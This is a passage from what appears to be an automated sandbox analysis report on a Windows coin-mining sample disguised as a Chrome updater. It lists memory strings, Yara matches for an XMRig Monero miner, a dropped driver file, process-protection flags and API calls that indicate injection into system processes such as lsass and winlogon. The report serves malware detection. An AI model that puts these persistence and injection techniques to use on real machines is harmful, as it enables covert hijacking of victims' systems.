Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000012.00000002.2989122565.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1819526785.000001FA481B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Contains functionality to call native functions

Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	4_2_00007FF78AB310C0
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey,	7_2_00000225DC642A7C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE21CC NtQuerySystemInformation,StrCmpNIW,	8_2_00000202C0AE21CC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	8_2_00000202C0AE26F0
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE292A7C NtEnumerateValueKey,NtEnumerateValueKey,	10_2_000002BAAE292A7C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	15_2_000001845B3B23F0
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B21CC NtQuerySystemInformation,StrCmpNIW,	15_2_000001845B3B21CC

Creates driver files

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB314E4	4_2_00007FF78AB314E4
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB32328	4_2_00007FF78AB32328
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB326E8	4_2_00007FF78AB326E8
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB31DB4	4_2_00007FF78AB31DB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7F52FA	5_2_00007FFD9B7F52FA
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC621658	7_2_00000225DC621658
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61B23C	7_2_00000225DC61B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61F2F8	7_2_00000225DC61F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61B030	7_2_00000225DC61B030
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6120DC	7_2_00000225DC6120DC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC652258	7_2_00000225DC652258
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64FEF8	7_2_00000225DC64FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BC30	7_2_00000225DC64BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC642CDC	7_2_00000225DC642CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC681658	7_2_00000225DC681658
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67B23C	7_2_00000225DC67B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67F2F8	7_2_00000225DC67F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67B030	7_2_00000225DC67B030
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6720DC	7_2_00000225DC6720DC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6B2258	7_2_00000225DC6B2258
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6AFEF8	7_2_00000225DC6AFEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABC30	7_2_00000225DC6ABC30
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6A2CDC	7_2_00000225DC6A2CDC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC1658	8_2_00000202C0AC1658
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABB23C	8_2_00000202C0ABB23C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABF2F8	8_2_00000202C0ABF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABB030	8_2_00000202C0ABB030
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AB20DC	8_2_00000202C0AB20DC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AF2258	8_2_00000202C0AF2258
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEFEF8	8_2_00000202C0AEFEF8
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBC30	8_2_00000202C0AEBC30
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE2CDC	8_2_00000202C0AE2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DF2F8	9_2_000002A6612DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E1658	9_2_000002A6612E1658
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DB23C	9_2_000002A6612DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DB030	9_2_000002A6612DB030
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612D20DC	9_2_000002A6612D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130FEF8	9_2_000002A66130FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661312258	9_2_000002A661312258
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C	9_2_000002A66130BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BC30	9_2_000002A66130BC30
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661302CDC	9_2_000002A661302CDC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26B23C	10_2_000002BAAE26B23C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE271658	10_2_000002BAAE271658
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26F2F8	10_2_000002BAAE26F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26B030	10_2_000002BAAE26B030
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2620DC	10_2_000002BAAE2620DC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2A2258	10_2_000002BAAE2A2258
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29FEF8	10_2_000002BAAE29FEF8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BC30	10_2_000002BAAE29BC30
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE292CDC	10_2_000002BAAE292CDC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED91658	10_2_000002BAAED91658
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8B23C	10_2_000002BAAED8B23C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8F2F8	10_2_000002BAAED8F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8B030	10_2_000002BAAED8B030
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED820DC	10_2_000002BAAED820DC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879920DC	11_2_0000026A879920DC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799B030	11_2_0000026A8799B030
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799F2F8	11_2_0000026A8799F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799B23C	11_2_0000026A8799B23C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A1658	11_2_0000026A879A1658
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879C2CDC	11_2_0000026A879C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBC30	11_2_0000026A879CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CFEF8	11_2_0000026A879CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879D2258	11_2_0000026A879D2258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953781658	12_2_0000017953781658
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377B23C	12_2_000001795377B23C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537720DC	12_2_00000179537720DC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377B030	12_2_000001795377B030
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377F2F8	12_2_000001795377F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537B2258	12_2_00000179537B2258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537A2CDC	12_2_00000179537A2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABC30	12_2_00000179537ABC30
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537AFEF8	12_2_00000179537AFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D52258	12_2_0000017953D52258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D42CDC	12_2_0000017953D42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BC30	12_2_0000017953D4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4FEF8	12_2_0000017953D4FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D541658	13_2_000002295D541658
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53B23C	13_2_000002295D53B23C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53F2F8	13_2_000002295D53F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53B030	13_2_000002295D53B030
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5320DC	13_2_000002295D5320DC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D572258	13_2_000002295D572258
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56FEF8	13_2_000002295D56FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BC30	13_2_000002295D56BC30
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D562CDC	13_2_000002295D562CDC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E1658	14_2_00000253067E1658
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DB23C	14_2_00000253067DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DF2F8	14_2_00000253067DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DB030	14_2_00000253067DB030
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067D20DC	14_2_00000253067D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E72258	14_2_0000025306E72258
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6FEF8	14_2_0000025306E6FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E62CDC	14_2_0000025306E62CDC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BC30	14_2_0000025306E6BC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBC30	15_2_000001845B3BBC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B2CDC	15_2_000001845B3B2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3C2258	15_2_000001845B3C2258
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BFEF8	15_2_000001845B3BFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD42CDC	16_2_000001ADECD42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BC30	16_2_000001ADECD4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4FEF8	16_2_000001ADECD4FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD52258	16_2_000001ADECD52258
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D5590420DC	17_2_000001D5590420DC
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904B030	17_2_000001D55904B030
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904B23C	17_2_000001D55904B23C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559051658	17_2_000001D559051658
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904F2F8	17_2_000001D55904F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559072CDC	17_2_000001D559072CDC
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BC30	17_2_000001D55907BC30
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559082258	17_2_000001D559082258
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907FEF8	17_2_000001D55907FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EB2258	18_2_00000241A9EB2258
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EA2CDC	18_2_00000241A9EA2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABC30	18_2_00000241A9EABC30
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EAFEF8	18_2_00000241A9EAFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AB030	21_2_000002152C1AB030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1A20DC	21_2_000002152C1A20DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AB23C	21_2_000002152C1AB23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1B1658	21_2_000002152C1B1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AF2F8	21_2_000002152C1AF2F8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBC30	21_2_000002152C3EBC30
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3E2CDC	21_2_000002152C3E2CDC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3F2258	21_2_000002152C3F2258
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C	21_2_000002152C3EBE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EFEF8	21_2_000002152C3EFEF8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89B030	21_2_000002152C89B030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C8920DC	21_2_000002152C8920DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89B23C	21_2_000002152C89B23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C8A1658	21_2_000002152C8A1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89F2F8	21_2_000002152C89F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316B23C	24_2_000001CD7316B23C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73171658	24_2_000001CD73171658
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316F2F8	24_2_000001CD7316F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316B030	24_2_000001CD7316B030
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD731620DC	24_2_000001CD731620DC
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD731A2258	24_2_000001CD731A2258
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319FEF8	24_2_000001CD7319FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BC30	24_2_000001CD7319BC30
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73192CDC	24_2_000001CD73192CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8620DC	26_2_000002824E8620DC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86B23C	26_2_000002824E86B23C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86F2F8	26_2_000002824E86F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E871658	26_2_000002824E871658
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86B030	26_2_000002824E86B030
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E892CDC	26_2_000002824E892CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89FEF8	26_2_000002824E89FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8A2258	26_2_000002824E8A2258
